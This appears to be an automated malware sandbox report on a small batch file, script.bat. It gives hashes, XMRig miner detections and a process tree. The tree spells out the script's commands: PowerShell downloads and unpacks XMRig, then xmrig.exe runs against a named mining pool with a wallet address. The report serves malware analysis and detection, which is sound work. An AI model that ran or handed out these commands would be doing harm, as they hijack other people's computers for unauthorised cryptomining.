Analysis
-
max time kernel
899s -
max time network
900s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
28/03/2025, 10:10
Behavioral task
behavioral1
Sample
script.bat
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
script.bat
Resource
win10ltsc2021-20250314-en
General
-
Target
script.bat
-
Size
793B
-
MD5
f29c7cf031f619739012fdbfa95bba54
-
SHA1
ccddd138b2e91a4da65da97ec11f2dc661782e60
-
SHA256
5e45e7089ffaee30e35a4b61eb918255fbd60c8876956c039165c89a45b51717
-
SHA512
1eaff6b177df441c856001e7b1367bc6697552f52249df64531d7eaa6ce5c3b05acfb8b6df791370acc7516cdc798b629693f3ce0b26062998ccd7fb558386e5
Malware Config
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral3/files/0x004600000002b1be-57.dat family_xmrig behavioral3/files/0x004600000002b1be-57.dat xmrig behavioral3/memory/2348-59-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-60-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-61-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-62-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-63-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-64-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-65-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-66-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-67-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-68-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-69-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-70-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-71-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-72-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-73-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-74-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-75-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-76-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-77-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-78-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-79-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-80-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-81-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-82-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-83-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-84-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-85-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-86-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-87-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-88-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-89-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-90-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-91-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-92-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-93-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-94-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-95-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-96-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-97-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-98-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-99-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-100-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-101-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-102-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-103-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-104-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-105-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-106-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-107-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-108-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-109-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-110-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-111-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-112-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-113-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-114-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-115-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-116-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-117-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-118-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-119-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig behavioral3/memory/2348-120-0x00007FF7FE110000-0x00007FF7FED44000-memory.dmp xmrig -
Xmrig family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 728 powershell.exe 3 728 powershell.exe -
pid Process 728 powershell.exe 5088 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2348 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 728 powershell.exe 728 powershell.exe 5088 powershell.exe 5088 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 728 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeLockMemoryPrivilege 2348 xmrig.exe Token: SeLockMemoryPrivilege 2348 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2348 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3416 wrote to memory of 728 3416 cmd.exe 83 PID 3416 wrote to memory of 728 3416 cmd.exe 83 PID 3416 wrote to memory of 5088 3416 cmd.exe 85 PID 3416 wrote to memory of 5088 3416 cmd.exe 85 PID 3416 wrote to memory of 2348 3416 cmd.exe 86 PID 3416 wrote to memory of 2348 3416 cmd.exe 86
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\script.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip' -OutFile 'C:\Users\Admin\Downloads\xmrig.zip'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\Downloads\xmrig.zip' -DestinationPath 'C:\Users\Admin\Downloads\xmrig' -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Users\Admin\Downloads\xmrig\xmrig-6.22.2\xmrig.exexmrig.exe -o xmrpool.eu:3333 -u 48iBkXw7ciAGbjhPdopSM8JtQy2rAx7MZgX2xbf6Sx3oASN6kAQo6nWYDwmDk6kmYPeVRPi8p1KUUGnp6T3Csuge8aPMtYS -p device32⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2348
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
1KB
MD5b94a5f9c019b614942fc29d049e77006
SHA17d22a700e14c52c6ded2a26cc063057b779d5c2e
SHA256ac01c39f1027c82f8d739b7a15c8fc17875bf33f3069f9acf0eb4a0d3b8803d7
SHA512301825dd58920d02a28650c9bd9a43d36d5d896fa72b79b49792a868f2df4d419dd6fdfe245f544f8becaff9585e63050fe2e6979dbc35a592017423a392633e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.6MB
MD55e48d84b33cc0ca0cdb29b03a875fd3a
SHA1597660c787259fad45f0e69cbb64fb781333c598
SHA25653b37a734ab27bb40626c6434029defbebe8470f2d89b97e7ce85b40c9a3b05f
SHA512a8a3d14a0ffb27fbc1a3e73c3e8dd2d0d7a35e9dc89eb14d9704d75cc9f424c539c042ae71c56197a90915a44fc19f4942c27b87aa0feae339b15a2853fdd3a8
-
Filesize
9.1MB
MD5cb166d49ce846727ed70134b589b0142
SHA18f5e1c7792e9580f2b10d7bef6dc7e63ea044688
SHA25649da580656e51214d59702a1d983eff143af3560a344f524fe86326c53fb5ddb
SHA512a39bd86a148af26fd31a0d171078fb7bce0951bb8ea63658d87f6bde97dbc214c62e8bd7152d1e621051de8a0ba77ffd7bda7c1106afb740584c80e68e1912ed